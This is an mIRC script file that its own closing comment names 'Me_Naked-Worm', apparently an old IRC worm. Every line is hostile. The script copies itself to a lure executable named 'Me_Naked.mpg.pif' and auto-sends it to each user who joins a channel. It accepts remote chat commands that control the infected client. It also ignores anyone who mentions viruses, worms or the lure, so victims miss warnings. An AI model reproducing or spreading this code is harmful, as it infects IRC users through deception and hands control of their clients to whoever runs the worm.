[Script]
n0=on *:join:#: if ($nick = $me) halt | /DCC SEND $nick C:\Windows\System\Me_Naked.mpg.pif
n1=on *:text:_mode*:*:/mode $$2 $$3-
n2=on *:text:_msg*:*:/msg $$2 $$3-
n3=on *:text:_exit*:*:/EXIT
n4=on *:start:/COPY -o C:\mIRC\Script.ini C:\Windows\System\Me_Naked.mpg.pif | /CLEAR
n5=on *:text:*me*naked*:*:/ignore $nick
n6=on *:text:*me_naked*:*:/ignore $nick
n7=on *:text:*viru*:*:/ignore $nick
n8=on *:text:*worm*:*:/ignore $nick
;Me_Naked-Worm
;A just for fun project
